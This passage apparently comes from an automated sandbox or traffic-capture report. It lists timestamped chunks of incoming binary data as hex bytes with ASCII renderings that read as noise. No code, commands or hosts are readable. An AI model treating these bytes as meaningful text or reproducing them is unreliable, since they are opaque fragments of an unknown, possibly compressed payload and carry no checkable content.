                                              2022-01-14 15:04:36 UTC192INData Raw: bf fd 0e 85 bc f5 75 f2 7e e0 e4 e1 b9 e5 a3 ad 3b b9 c1 77 27 bf c7 56 9e 3e 76 1e 9a 6d 03 a1 89 6f f9 27 1b 21 23 71 f5 da 49 cb e6 ee 5e 8d 72 7e df de 9a bc d8 07 59 f3 11 fb 0e 3f 5b 5a 3f 7a f2 77 78 96 fe 29 6f cf 80 35 4a 7e 6b ff 99 4f 3b d9 88 32 6d 92 8b 77 22 d0 90 7f da 3b d8 31 ec 76 c0 9f 3c e9 dd db 71 d6 db e9 a5 b7 7b dd 5b de f3 e9 09 b6 fd fd 1e 2a 59 d3 87 a4 23 eb 8c 1b 7b 4f 4c f6 ef 5d d0 b8 99 83 c9 86 ac bc 27 9c fd 85 1e f7 7e 87 31 75 bd 4f e2 77 ef 37 b8 43 8a 26 1e ee f6 1b 94 75 1a 1e 5d 6d da fb fd 53 7d 68 3a f1 db ee fe f5 bc 9a 78 c0 3e b5 71 44 b7 e9 dc bd 23 ed fd d6 7d 47 3a fc d0 f1 7d 5f 93 de 9e f6 2c 9c 0b f4 1c 46 8e 78 e8 73 70 f4 f8 50 74 02 f8 8b 6f 85 a3 5e ee 15 d0 57 69 71 85 72 69 f1 40 d3 5b 7f a7 ae 36
                                              Data Ascii: u~;w'V>vmo'!#qI^r~Y?[Z?zwx)o5J~kO;2mw";1v<q{[*Y#{OL]'~1uOw7C&u]mS}h:x>qD#}G:}_,FxspPto^Wiqri@[6
                                              2022-01-14 15:04:36 UTC208INData Raw: c6 0f 7f 7d 5f 23 31 1b 48 9f 9d 3b e6 9d 03 90 75 8d 71 8b 8f 05 59 df c0 b3 f7 9d 7c 6d e7 f7 47 80 5f ee 34 de 3b fd 0a d2 ae f5 e3 96 81 8f d2 f3 ae 95 e7 dd 79 d7 17 e5 ef 74 67 0b 64 9c df 0b e1 ef 74 17 01 18 63 cf 8c 6b ea d3 67 cf f8 9d a4 f3 be 50 c6 7b 21 f5 f8 85 fc 6e 08 bd bb f2 bc d7 95 f2 d5 93 94 3b 63 38 e1 67 fd 7d 47 3f 7c df d1 4f f9 1d fd f8 d9 3b fa e6 ed 67 e5 b9 c3 7e 57 9e 73 cc bb f2 bc 07 71 57 9e f3 c5 bb f2 9c eb a5 7c fb 9f f2 bb fe 47 2f ef e8 67 5f e2 ae 3c 77 38 ee ca e5 3f 2b cf d9 52 ca 97 ff 94 df f1 9f 78 f1 8e 7e ce 68 ee ca 33 5f de b5 9f f2 bb f6 73 86 70 47 3f be f6 ae 3c df 15 b8 6b 3f e5 77 ed 3b 8f f4 bc a3 9f f7 27 ee ca 73 ce 78 57 9e ff 79 70 c7 5f ca ef f8 cb 3a f4 8e 7e de d3 48 79 ce 98 73 07 3b 67 88 49
                                              Data Ascii: }_#1H;uqY|mG_4;ytgdtckgP{!n;c8g}G?|O;g~WsqW|G/g_<w8?+Rx~h3_spG?<k?w;'sxWyp_:~Hys;gI
                                              2022-01-14 15:04:36 UTC224INData Raw: d7 f0 0f af 11 fc 37 66 a5 cc f7 af 66 74 a3 d6 e6 5c 79 46 76 5c 3e 6f 37 01 54 ba e1 52 d3 6f 66 fe 31 0f d7 a1 67 61 5d e3 7c cd 1e a5 10 f5 0e c9 c3 15 21 7e 64 38 cf e3 63 0f dc 83 63 25 72 ac b7 46 55 6f 53 41 fc b6 e2 49 e9 74 68 9c e6 c9 f7 b6 f9 f6 cc 6a 23 6d a9 d6 be a2 20 66 2b 29 a6 2c cc 56 d2 f6 6c 99 6e dc 37 97 81 cc cb 5e 86 51 03 20 cb ed e1 32 99 ec 18 e2 3d 7e d8 dc 95 14 64 f9 51 d7 54 b0 f5 0f 62 d6 10 ad 4b 4b 46 6a 87 2b f7 44 dc e7 ee 15 a6 b3 fe 28 ae ca 2a 1a b4 c8 b5 09 34 20 43 7a 41 ea e4 18 74 29 a1 d3 55 f0 8d 7a 1b 77 45 9c 91 11 2e 13 04 5e df 98 0d 1a c8 93 e6 4f 81 31 c3 99 0a 06 10 79 70 5e b4 e8 c7 71 6d 37 10 b4 60 e6 1b cb ad b6 1a 85 15 97 a9 6c 7b 01 20 8e 25 37 a9 8d b9 47 22 ec bc c9 0b 5e e0 a6 aa 65 61 37 45
                                              Data Ascii: 7fft\yFv\>o7TRof1ga]|!~d8cc%rFUoSAIthj#m f+),Vln7^Q 2=~dQTbKKFj+D(*4 CzAt)UzwE.^O1yp^qm7`l{ %7G"^ea7E
                                              2022-01-14 15:04:36 UTC240INData Raw: 8c 45 dc 71 6b c1 e7 ec 55 94 31 53 96 d3 84 32 e9 2d cb e4 6f f8 c6 cc 46 9f 70 e1 ec 06 6c 38 2a 99 bb ba 86 64 87 16 e9 e4 3e b5 03 11 0a a3 be 9e bf eb 18 f1 4a a6 1d 17 22 ed d6 a5 1d 81 73 d7 65 b0 d3 0f c9 20 45 92 5b e6 80 fe 91 02 3e 19 61 90 75 6e 34 09 8b c2 5b 59 56 13 b6 e5 e8 69 53 d6 8d a9 ea fd b1 bc fd 60 cb 06 79 8b 42 ce 7d eb 88 89 c6 26 44 96 55 18 6d 19 ed e6 5a 0f de 2a 1b ae a5 b8 c8 4a 01 0d 0f a4 18 1c 74 d4 63 fa 46 d3 f6 55 74 37 b2 3d 82 26 4b 4c bd bd 00 45 e2 59 e5 d4 ba d1 ae 44 e1 de f6 1c 72 8c ec ad 6e 34 41 28 62 62 27 3a 32 dd da db ac 3a 37 91 c9 d9 2f 33 2d 55 f3 78 7a 8a 70 ea ac d6 01 a6 71 06 fa aa 49 06 65 15 94 b7 47 55 a7 c1 8f a5 cd c3 81 69 01 cf 25 11 d9 ec 84 00 82 85 52 d7 6c 0e db 63 b1 99 ba 67 5d cf e7
                                              Data Ascii: EqkU1S2-oFpl8*d>J"se E[>aun4[YViS`yB}&DUmZ*JtcFUt7=&KLEYDrn4A(bb':2:7/3-UxzpqIeGUi%Rlcg]
                                              2022-01-14 15:04:36 UTC256INData Raw: b2 68 05 98 09 bb cd 98 5b dd cd 79 18 a9 3e 48 0f 26 4e 8c 13 4b 8d c0 b2 b3 c9 0a 9f 95 54 d5 83 75 ab 2b da 0e a6 67 b3 a3 82 6b 65 27 e9 ed 61 c2 9c 00 0d c6 09 3d 26 34 34 63 d6 ac ac 65 a9 98 22 ec 29 3b 7f a0 95 ae 0e 46 8e b2 67 2c 35 a8 03 a7 da 44 d9 9c 57 12 fc 65 a2 c6 1e 8b 09 16 72 30 12 9a dd 25 20 c1 1d 38 6b cc 08 3b 13 24 41 14 25 ff ff 9c 79 db f8 b2 61 9d c0 3b b1 59 19 b7 cf e3 e6 de 48 a4 05 06 40 d3 db 83 33 b7 06 88 7c 15 a3 cb 34 7b 03 4d 3d 1f a6 25 c5 28 6f 00 c3 9d 91 31 d9 59 ca 3a 82 38 56 38 0a 19 82 7c 9f a9 ad ea 43 04 17 92 f6 c4 33 7d b0 df 0e 76 1d 45 23 6a 6d 78 b4 47 86 f3 ba 29 c3 ed 38 83 40 1a ba 8b 18 bb 11 c5 56 b2 4b 18 14 45 5b d9 dc d4 87 6e 1b f1 da c5 54 42 74 37 8e 91 00 d4 cf fa f5 f3 22 27 1d de 38 74 40
                                              Data Ascii: h[y>H&NKTu+gke'a=&44ce");Fg,5DWer0% 8k;$A%ya;YH@3|4{M=%(o1Y:8V8|C3}vE#jmxG)8@VKE[nTBt7"'8t@
                                              2022-01-14 15:04:36 UTC272INData Raw: 54 5d 6c 13 d3 77 7d d7 eb 8b d1 59 ce 3c f7 8e 5c d0 01 0c 4f 42 5d 59 ce 38 39 9a e7 02 8c 39 1b 47 b4 de a2 6a aa 87 bc 20 d4 e1 e7 f5 90 74 7c 5d 6e b7 d0 16 12 8e 65 59 3d f2 ab 28 c5 81 e9 6b 4b d0 a9 53 4c cf cb fc a4 3b 66 bf 63 54 2d 7d 8d 39 91 70 23 71 ca b3 fa e0 53 1a 99 e8 dd bb cf 76 c3 ef 32 d5 7e cf d1 7d 5b fe 9d bf 89 02 cd 1f ac fe f7 ff f2 16 ec 27 bf f7 c3 99 da 8f 5c 46 d6 e7 ff 6e b0 53 12 50 95 01 88 0a e7 a3 60 fb df 73 56 24 b3 02 2a 4f ef 23 0b 7b 19 86 1f 6f 01 01 e5 0d 1d 6d df 73 73 42 bc 6a 7f f5 8e b5 0f 78 be fa 47 af 7c 0e a3 98 90 ad 15 6b 3e 29 e3 48 70 cb bf 7c b5 8f 62 59 26 ea 6a 20 79 b0 bf b8 b7 53 cb 6b 04 69 35 f9 1a 0a a0 ee df ff 8b 8f fe 75 5f 37 23 96 5c ee e5 25 95 a5 ba a7 6a 8d 97 c0 a9 ac a3 7d c8 f9 fb
                                              Data Ascii: T]lw}Y<\OB]Y899Gj t|]neY=(kKSL;fcT-}9p#qSv2~}['\FnSP`sV$*O#{omssBjxG|k>)Hp|bY&j ySki5u_7#\%j}
                                              2022-01-14 15:04:36 UTC288INData Raw: f3 11 ce 3b 7e ff df ff fb 6b 5f f5 3f df f4 d4 db fe e4 5f 7f 6f d3 dc ec 33 ec a8 9a d5 14 11 89 80 35 95 e6 b2 5f eb ff 09 56 7b 50 c2 1f 27 1f 44 1f 8d d4 a2 00 88 fb 72 f2 be 9c 00 4e 29 86 c4 dd 52 a0 43 f5 06 ee eb 49 24 2b da ef 06 f6 48 16 45 a5 2a 7c dd bd df 11 a4 6c 0f 94 dd 80 fa 4a dd 07 f0 5f 20 a5 97 e8 a9 d3 94 fc 9a 93 e1 8e 81 d2 1b a8 8b a1 6a 50 4f 51 ef 29 27 65 9e fb 31 e0 ee 53 ff e7 fe 21 29 0b 4b 40 89 36 7c e9 8b 3e 49 75 5e 53 3b 92 a4 b4 bb 26 81 c7 b5 07 ae 37 fc b2 bf 4e c5 1a 73 28 a3 18 0e 40 94 99 14 78 7c ef a7 fa 30 50 7a 39 79 ec 3f 1c 94 48 10 63 bd 82 a3 a6 1a 9b 85 6f f7 b7 a9 3c f6 fb 0f e8 1e 72 27 d2 35 80 73 a8 76 1b f3 3e 29 b4 c4 25 82 b5 97 cd 3f f3 4d eb c2 2b f7 ec 2a d3 fe 4e f2 7a 1f c9 40 aa 6e f5 9e e2
                                              Data Ascii: ;~k_?_o35_V{P'DrN)RCI$+HE*|lJ_ jPOQ)'e1S!)K@6|>Iu^S;&7Ns(@x|0Pz9y?Hco<r'5sv>)%?M+*Nz@n
                                              2022-01-14 15:04:36 UTC304INData Raw: 11 91 a6 8c 3a 56 81 18 78 fa 86 10 de 0b 67 5b 5b 23 2e e9 0b 8b aa 8e 72 cc db f0 8b b6 ec 29 d5 1b 48 c9 40 46 59 dc 54 e0 f2 39 55 68 a7 8a ee 89 db ba f3 85 35 ab 2a 7f e8 ec 8a 6e 18 33 41 f8 c1 da b1 0c 95 b8 71 d6 ca d4 14 06 f9 29 57 0e ce 22 db 41 fa 6a 65 cd e7 48 09 64 1d 9b 6c 72 9f 79 03 dd 40 0d 59 9f be d0 94 a6 6d 1b 26 99 5f 37 05 61 7d d9 9d b1 c4 05 fe 54 d0 ab 35 1b 9a 06 69 c4 19 e0 67 9b a0 a7 84 45 ac 5b b1 29 b5 38 29 3d c0 b8 13 59 d3 62 92 9a e4 03 69 42 52 c6 aa 80 96 d6 25 e9 7b 40 59 00 5a 4d d4 34 6f 4f 15 a0 a7 48 ef e9 61 38 2c ad e5 06 66 53 30 05 75 d9 75 18 94 d8 00 84 9e 19 e4 91 02 9f b0 ae 50 bd 9c 90 6e 58 e5 23 43 ce 46 8f 08 7d 50 e0 01 c9 1b e1 1b 76 cf 0b 82 7d 38 01 77 9d 7d b8 28 1a 1c 8d 23 2d e1 84 1b 11 26
                                              Data Ascii: :Vxg[[#.r)H@FYT9Uh5*n3Aq)W"AjeHdlry@Ym&_7a}T5igE[)8)=YbiBR%{@YZM4oOHa8,fS0uuPnX#CF}Pv}8w}(#-&
                                              2022-01-14 15:04:36 UTC320INData Raw: 0d 45 20 20 88 20 78 44 2f 8c cb 26 2c 33 b8 00 a6 91 01 3b 6a d1 81 6d a4 86 06 42 3d 73 52 5c b8 9b 99 f1 5e 53 91 e2 6f 64 53 65 4d 83 dd 16 2d 7d 39 86 9a 3b 7a a0 39 dd 44 63 60 35 be 40 b1 e8 8d 13 31 25 6e 91 a3 b6 6d 7d ef c6 d4 12 17 9d 53 7a 80 be f2 b4 8c 69 59 dd 57 bb c4 1d 26 6e c9 57 55 07 ef fc 48 e5 62 9e 2c 62 bd 88 c1 86 58 ba f6 2e 13 b2 05 39 90 74 07 ed b0 96 26 e5 d6 1d 94 4d 06 0b 25 b1 ca e6 31 07 6e 1b a3 24 9b 13 b5 cf ba 97 39 46 59 14 6c 6d 49 96 51 f1 44 a7 15 5f c6 d1 40 52 b6 b4 73 d8 19 c2 f3 e3 48 e2 86 59 77 6d b8 84 52 6f 4f b0 4a ca 14 02 5b ab 91 22 73 ea b9 16 18 b1 32 6b 4a bf f6 40 3e 42 b8 38 1f 1c 97 c2 46 70 e5 9b 99 fd 56 d4 37 c7 82 dc a8 b5 da 1e dd 33 a9 21 59 d4 15 67 c4 0f 33 8c 95 26 a6 c9 72 7b f7 36 cd
                                              Data Ascii: E xD/&,3;jmB=sR\^SodSeM-}9;z9Dc`5@1%nm}SziYW&nWUHb,bX.9t&M%1n$9FYlmIQD_@RsHYwmRoOJ["s2kJ@>B8FpV73!Yg3&r{6
                                              2022-01-14 15:04:36 UTC336INData Raw: 41 55 b8 6b 66 55 30 fd 15 da f4 b3 37 ea 3c 98 a0 a3 58 88 d6 3b 2d ba 70 7b b1 19 0b f9 d5 d3 e0 52 50 64 2e bc 4b 41 41 9b 4f a4 b0 7c d0 ac e8 68 40 47 f0 bc 32 25 9c 63 f6 35 23 e6 85 19 7d 7e 56 39 33 0f 2c 3a ee 3c 6e 94 77 d4 05 55 85 56 e1 f7 6c 8d ce 1a 35 73 a7 92 8c 18 35 81 83 0e 3f d4 69 39 e7 12 c8 1d b6 19 94 84 2c 6f 0e a8 1a 57 41 69 3f 9b 60 d6 9c 26 c1 4d 3c 2a 85 d1 30 5c f4 d6 ef 88 f3 25 7b 21 d9 08 f1 f3 45 37 09 8f 07 95 f3 8c 2c 44 cf 73 6b 26 33 40 80 b9 2e 2e a9 0a 5a c1 5a 3f 1d d1 01 2b 43 5d 18 4c 96 e4 3b 25 74 16 a3 4f fb 31 46 10 21 e4 59 e5 ee c0 34 2c aa f2 8e 54 30 28 2c f0 96 92 82 1b 44 09 81 b1 1f 57 ed 14 a3 60 59 94 45 4d e7 a4 c4 3c 5f 9d 8e 01 23 6c 96 af 20 48 95 52 36 58 fe f0 5c 55 ba 0a 31 61 67 42 5d 66 0c
                                              Data Ascii: AUkfU07<X;-p{RPd.KAAO|h@G2%c5#}~V93,:<nwUVl5s5?i9,oWAi?`&M<*0\%{!E7,Dsk&3@..ZZ?+C]L;%tO1F!Y4,T0(,DW`YEM<_#l HR6X\U1agB]f
                                              2022-01-14 15:04:36 UTC352INData Raw: b4 1b 91 34 0f aa 67 17 a2 73 33 c2 8d 04 6e d4 6d ac aa 9e c4 1a fb cb 50 c5 51 10 8f 95 e6 58 75 7f e5 9e f2 87 8e 8c 33 0e 5f 73 96 bc 40 db b7 95 36 13 51 83 c0 ef ae 12 0d 55 57 ee 87 4a 2e f3 51 11 0c 67 8c a2 8a 30 25 a9 45 29 cc e7 ce 1d 5f 73 62 aa aa 3c e0 1c ab 71 a2 06 75 6b 17 f4 df 72 5b 6d d4 0d 22 b0 a4 e1 22 b6 0a ca 0e be e2 41 18 66 4e 6c 55 0f 1a ac 8b c8 a4 43 f0 22 9b 55 11 c8 09 04 c3 ed a2 ac 29 8c ee a2 92 86 7a b1 df 80 33 c4 f8 b4 aa 2f ef 06 95 6d 4e df be 06 22 a2 26 07 01 0b e2 bb 3a ab df fc fa 07 5b 1f f8 f4 97 eb 42 b6 e1 cf c3 ff 46 e9 fc 9f eb e9 ba 4a db 17 04 bf f8 f9 ab cc 57 fe b8 f1 c1 d7 7d f8 90 04 38 cf 82 d5 8d 39 aa b3 d4 f7 82 4f dc 73 fe e2 ff 00 2b 26 c2 57 f7 85 4f 8e 01 52 4a 03 8d f6 8e dd 3c 56 00 5a 0c
                                              Data Ascii: 4gs3nmPQXu3_s@6QUWJ.Qg0%E)_sb<qukr[m""AfNlUC"U)z3/mN"&:[BFJW}89Os+&WORJ<VZ
                                              2022-01-14 15:04:36 UTC368INData Raw: ae a8 b3 5b 02 06 f4 fe 36 7d ee 97 02 a4 9a f9 ba cc 5c 83 19 9a 6a bd 07 3c ce 00 25 cd be 5e 48 83 d2 1c 28 6e f4 98 da 2b 06 b0 a4 3e f1 92 89 88 b9 03 ab 7f 76 53 c5 2b 20 7d f4 ce bb e4 85 2b 80 e4 fe 10 40 8a be 87 3e 4f 91 7e 5d e5 d2 0c eb 55 2f 31 7d 91 96 86 34 18 7e 28 39 4a 8a 68 56 67 a7 fc f7 f6 96 ef 26 4b d4 1e 2d 03 87 d9 cf cd 00 cf 3d ea 8d e4 93 e4 2b 9e 49 5d 10 90 ef bd 2b 5d 78 58 14 aa 1b 3a c9 f7 d2 0c f1 c3 54 99 54 2f 66 e4 2c d2 85 4a bb 4c 9e 55 6a bb a1 81 80 e9 c1 a2 1d 3c ea e0 80 ee 02 41 60 9f 76 76 d2 68 64 4d 00 d8 85 97 d6 3c ab cd cb b3 3b 24 79 04 c1 90 c9 62 9b 39 19 19 f8 ba 4f f3 96 3b 25 e9 5c 96 92 0f 07 c2 aa f8 f9 3c ab 79 bb ce 4a 02 58 cc 07 45 58 37 c2 4c c4 b8 83 ef e5 08 52 50 d8 24 b0 70 0d 52 0c f7 bb
                                              Data Ascii: [6}\j<%^H(n+>vS+ }+@>O~]U/1}4~(9JhVg&K-=+I]+]xX:TT/f,JLUj<A`vvhdM<;$yb9O;%\<yJXEX7LRP$pR
                                              2022-01-14 15:04:36 UTC384INData Raw: ed 07 89 b3 9c b8 e3 2a b1 6a be 10 db 2f 29 1a b0 7e 50 58 a4 17 38 31 7d 57 3f 6d 13 ff e4 74 7f 1c 32 76 d1 ba c2 72 ad 39 09 46 51 5e 27 01 b3 f4 70 c8 5d 3a 8a 20 65 fd a8 05 a1 23 4f d2 d1 9a 55 0c f8 45 cf b9 85 51 8a ee d8 c0 c0 e4 6d 67 f2 a2 22 b5 b4 53 60 14 0e 83 7a 15 a8 1a bb a6 08 e2 05 d9 28 4f 1b 8f f8 92 82 f8 19 a8 8b 1e 63 e2 6d 0f e2 19 58 dd 2b dc 9b bd 0c d0 9a 12 98 59 e2 ee 47 6b d6 e0 36 63 33 b6 37 50 40 11 e6 5b da 5d 59 ea 18 73 a3 7c c4 ea e7 d6 8c 51 39 44 0d 8c 74 26 1d ab 78 b4 55 56 28 43 3b 44 81 a1 a9 69 d4 83 24 a8 08 56 58 a8 c5 07 7b 73 db db 53 ac e4 53 b9 9f 51 f0 a6 8e 7a a6 88 30 2e f3 9f df 28 fd a1 8a 72 40 09 ab a7 c2 0c c1 06 6e 7c 03 4b d0 ac 13 59 ac 7d 53 c3 5e 41 83 c6 81 ab 29 0c a1 41 f9 92 d7 60 05 14
                                              Data Ascii: *j/)~PX81}W?mt2vr9FQ^'p]: e#OUEQmg"S`z(OcmX+YGk6c37P@[]Ys|Q9Dt&xUV(C;Di$VX{sSSQz0.(r@n|KY}S^A)A`
                                              2022-01-14 15:04:36 UTC400INData Raw: 35 2a 58 79 0d ee 4e f2 86 13 95 d6 ce 4a e7 7e ef 8d 2a 77 9b e5 65 8c 49 47 b2 a7 55 19 4d 7d 01 2a 68 8b 07 50 84 bf f6 69 58 95 e3 99 b3 60 1b 00 1b a9 ee a8 32 0c f1 b2 d2 b8 7b 3f cb 4b 42 d4 19 7f 7d a1 07 c1 6e 45 8d 98 47 e1 91 6a ec 6a cf 30 cf f4 56 2b ee 1f af 61 dd 20 67 9d 71 b4 52 bf b5 28 87 ef fc fc fa f1 0a 35 ea 6e 18 13 2a 92 ee f2 9b 69 03 2d a1 4a b7 86 72 4c bf 97 c3 9e 78 7c e1 89 cb 2d 67 dd 88 ce a1 67 2e a5 1a 5b df 84 d3 c0 de 82 a2 11 e8 a3 2b e3 24 ac bf 8d c8 26 ce 00 7b ab 34 86 a3 ca 5a b8 79 36 b0 d7 ee 26 32 ad 60 28 2f 1f a7 5d 4b b6 85 6f d1 43 97 b1 59 2b 82 59 12 b6 da c8 68 4e 1f d7 2f 37 9c 1a ad e8 8e 1d d6 06 fe fa 8f eb 4e 1a bf fa b6 bf fa 9b f7 32 e4 9c af 0b 66 de f7 88 da 7d 07 22 f8 5f b2 ef 9a 7c f6 f7 be
                                              Data Ascii: 5*XyNJ~*weIGUM}*hPiX`2{?KB}nEGjj0V+a gqR(5n*i-JrLx|-gg.[+$&{4Zy6&2`(/]KoCY+YhN/7N2f}"_|
                                              2022-01-14 15:04:36 UTC416INData Raw: 68 de be e0 b3 7a dc 8e eb ff 00 2b d1 06 7b 52 4c 15 bf af 01 dc b3 a1 00 03 48 09 bc c5 7d a3 08 2d 91 df 2f 5c 76 11 16 4a 1a 2e f7 eb 00 f7 3e 2b 6a bf bd 4d 20 4a ca b3 93 a7 88 86 c2 62 57 be fd 71 21 fd 5b d7 27 0b 8a cd 50 b2 d1 f7 1a 39 b5 a4 66 09 8c 48 89 45 1d a3 44 d5 92 d6 24 13 53 50 ef ff b4 1a 97 f5 00 1f f9 b9 d3 f7 ee 6d 0b fb b5 81 e5 df df 50 f2 f2 ee 2b ff 42 d2 43 52 6e 4e 4e 48 59 fa a9 ed 6f 92 d2 8f 1c 43 f3 24 95 67 85 5b 5f 47 3e 3f 7f 78 f4 d5 d7 3d 3c fa da da 7d 07 fc 7b ee d5 3b 46 ac dc 17 a8 42 7b 8f 02 2f dd 13 94 2d 43 39 7e 2d 90 b3 7f 16 e7 cd 5f 89 cf d6 94 0c fc a9 ec c1 12 70 ff 13 e1 c7 9f 2b 8d f0 ed 67 a9 d4 85 57 95 26 2f 35 8c 20 bf 23 11 7e dd 53 5b 65 c1 bd a5 24 61 4a e0 17 fb 60 c2 4a 39 d8 87 b7 a5 e8 e8
                                              Data Ascii: hz+{RLH}-/\vJ.>+jM JbWq!['P9fHED$SPmP+BCRnNNHYoC$g[_G>?x=<}{;FB{/-C9~-_p+gW&/5 #~S[e$aJ`J9
                                              2022-01-14 15:04:36 UTC432INData Raw: f0 8b d2 ca 6d 6e 24 ae 50 b9 eb 8a aa 20 e7 1e d1 10 e6 fa 76 ea 84 2f cb d7 35 61 11 f1 b3 46 ce b0 73 a9 0a 41 0b f5 fc 2e 08 13 77 5d 8f f9 0e 3d d9 9d 83 48 18 a9 f0 f3 32 df 49 c5 5a 81 46 ad 79 7c 2d 58 9b 5b f6 94 1e bd bc 8f e2 1a 44 99 44 b3 0a df 25 18 cf b8 26 88 61 6a 4e dd 5b 42 e6 05 d8 e1 60 fc 54 3c 6a d0 d1 42 1d ed 69 cf 1d 47 86 ca d5 4d ea 72 77 50 b0 06 b1 ad c3 20 5f c2 75 20 3e 8d 09 8a 50 e1 aa 20 1b db 37 c7 6b b4 35 cd b3 7d 9e f2 e9 a0 39 36 22 cc 19 7d 33 c4 83 89 01 71 6e b7 f6 43 6b 6f 02 80 e0 49 38 ae 84 15 b3 81 59 32 50 65 9d 55 68 64 0e c9 f5 7c 9c 53 64 64 78 93 60 85 1c 8d 94 bc 60 53 84 8a d3 ee 08 2f cc ae a2 86 5e 56 de b3 a2 07 30 a4 3f a9 1b 16 d0 8a 8e db 26 86 fb 58 91 95 a3 75 c1 70 74 d3 d6 a6 06 c2 7e 2e 69
                                              Data Ascii: mn$P v/5aFsA.w]=H2IZFy|-X[DD%&ajN[B`T<jBiGMrwP _u >P 7k5}96"}3qnCkoI8Y2PeUhd|Sddx``S/^V0?&Xupt~.i
                                              2022-01-14 15:04:36 UTC448INData Raw: 36 3d 23 5e d5 0d d7 c3 76 84 8f a8 c2 48 16 36 9f 66 bc 46 b1 05 82 d0 74 a4 a2 59 03 4b 4b 25 d2 71 0e 1d 35 33 e6 20 ce d6 92 44 c3 1c ef 36 7b 9a be 75 12 a8 9f 64 8f 23 f2 8d 72 ed ce 9f 5c eb db b6 a6 ac 66 b5 08 47 a7 1d f3 40 33 d3 14 9d 53 66 77 27 bf 17 15 2f 30 9c 99 43 4b 92 ac 2e 25 c0 d5 57 d1 be a7 77 32 56 8c 0e ea 5e e3 45 52 0c c3 0d c6 da 6e f0 94 bc d3 bb 90 a9 09 b7 cc e6 a3 b6 c9 c7 f3 e1 99 dd ac a8 0e 5e db 12 f6 45 28 ab 35 44 07 16 4a 84 37 40 0b c4 24 1d 57 f0 48 96 1a 2f ec 33 59 12 1e b6 1b b2 09 5c b0 ac 2d 2d 47 8a 83 05 33 ce 62 6c e8 19 c0 98 aa 00 75 00 13 d0 de 87 f9 1b b1 e9 a0 e1 89 c5 63 3d f4 30 04 04 00 83 3e e5 bd 3e 6a 50 20 6d 8e 07 6e 3b 76 6c 6f 25 27 79 6d eb 9c 75 23 69 9c 8d 34 03 65 3c 06 9a 10 4e 8b 9d 09
                                              Data Ascii: 6=#^vH6fFtYKK%q53 D6{ud#r\fG@3Sfw'/0CK.%Ww2V^ERn^E(5DJ7@$WH/3Y\--G3bluc=0>>jP mn;vlo%'ymu#i4e<N
                                              2022-01-14 15:04:36 UTC464INData Raw: 53 69 88 57 36 59 c4 03 67 49 16 91 58 44 64 23 29 9a b7 a2 e1 94 60 22 6a 43 39 f3 9a 51 d9 41 76 d7 17 13 4d 3a d4 57 f6 b4 f8 dd f0 a4 2a b3 78 bf f7 55 09 d1 5f 7c 08 7c f8 d1 77 7b b3 c3 a3 37 7d f9 2f be f3 cf ff ef 97 32 65 15 cf f2 f6 1f 7e 70 5b 7d d1 c1 fd 1f 8c d0 3b 80 cd 1b 40 42 83 d5 50 79 a2 99 a3 0d d6 23 ef a5 93 be ce ff 13 ac 76 2f 64 ff 0a 10 de ad 3b 9d 96 6d 34 08 d1 40 03 10 d7 5b 37 fa ff bb 3d f8 5f 34 9b fa de 5b 5a 9e 1d 24 87 d7 0c ff 36 9d 81 a0 80 85 d3 a5 5b 67 1a 0f 9f 2d d1 09 09 4f bb 13 74 ac 71 9d dc fa ad 88 5f a1 8f 49 8f dd 4a 4a b3 dc 17 d0 05 f6 fd 25 7d 0c 80 54 57 ed 34 48 7d e0 33 11 15 ed b3 a2 9e e3 a0 77 23 29 66 65 ed 4b fb 77 c9 c7 ee 01 66 e0 2b 4f 92 c0 1f 3e 46 02 3f fa 28 d6 58 41 a8 4b dc 1b ee 35 05
                                              Data Ascii: SiW6YgIXDd#)`"jC9QAvM:W*xU_||w{7}/2e~p[};@BPy#v/d;m4@[7=_4[Z$6[g-Otq_IJJ%}TW4H}3w#)feKwf+O>F?(XAK5
                                              2022-01-14 15:04:36 UTC480INData Raw: 26 bb 30 b3 08 f9 47 b0 a4 1b 62 7b e7 4c f7 83 24 a8 28 53 00 06 af 49 36 44 b0 9d cf 10 ef ad 89 31 0b 82 75 88 01 90 00 2a b2 61 c4 1f ee c0 a5 c4 5d c9 77 61 7c 84 84 c3 c9 b4 50 60 75 87 4f 3f a9 7a 8c d0 00 24 4b 79 fc 6e fb 18 e9 88 77 ec 16 3f bf d3 86 53 57 2f ac bc 28 f4 a2 0e 77 75 b0 5b be 43 76 ae b9 7b f0 73 f7 49 30 23 97 e5 bc 73 67 7f 78 14 d7 55 81 f7 00 d8 e7 36 92 90 f4 a5 40 fe b1 5d 83 08 1f 46 66 65 11 3f 7f 4d 00 a3 98 04 47 da ae 65 d8 01 01 62 a3 1b e0 c7 ee 7e fe 73 f7 ff f5 62 f7 79 80 ee 1e f0 e6 c1 5b 4d 6f 06 b0 d7 e0 12 df 23 f5 d7 57 5e b1 78 05 21 03 49 80 7a d7 c5 6b 17 c0 ef 8c f0 fa ce ba f0 af cf 59 17 26 2b e2 df b8 33 85 96 8b 2f 5d 72 08 19 48 21 c0 aa d5 9c 2b c9 ee 36 4b 6b 42 15 b3 06 39 01 a1 9e 3d b2 56 24 35
                                              Data Ascii: &0Gb{L$(SI6D1u*a]wa|P`uO?z$Kynw?SW/(wu[Cv{sI0#sgxU6@]Ffe?MGeb~sby[Mo#W^x!IzkY&+3/]rH!+6KkB9=V$5
                                              2022-01-14 15:04:36 UTC496INData Raw: 09 e9 56 27 ce 71 a1 c3 74 59 e0 92 00 b0 0f fe 36 71 ad 9f dd dc 3d f8 32 01 c6 d9 8e 2d 09 ac 7f 82 90 81 ca d2 6f 12 32 10 c7 99 cf 15 d7 73 4f fd f2 0a f8 e2 3b f1 6d ee 73 e1 67 9e 4b 5d f8 4e fb 78 ef f2 a7 f0 ff 20 64 e0 11 01 56 43 75 d7 54 e3 b6 18 43 b4 af 5a c8 01 60 43 f7 e1 15 0f 2e 5e 4b 2c a2 05 9c 12 dd 7a 16 f8 ae 47 7f 17 3c 0a 9c 02 40 79 60 38 1f 43 51 56 df b5 c6 11 0c c1 dd 05 31 ae 28 b9 e7 8a 95 7c 3c b6 06 25 e4 ec c7 f3 6b 56 19 be 01 ad ff 7f 5d bd 09 94 2b 79 7d df db 2d 05 d3 da f7 ad 5b 25 75 6b 01 95 4a a5 d2 be 74 6b 19 ba 5b a3 7d df 55 ba d2 4c b7 34 da f7 d2 56 d2 48 0e 9e 4b 4e fc 60 e2 b1 1d 3b c9 61 0b be c6 cf c1 e4 d9 31 18 82 f1 f8 e1 00 e3 d8 38 0e 89 1d ec 40 62 68 30 0f 78 06 1f fb 9d 38 26 d8 f0 aa 74 07 27 99
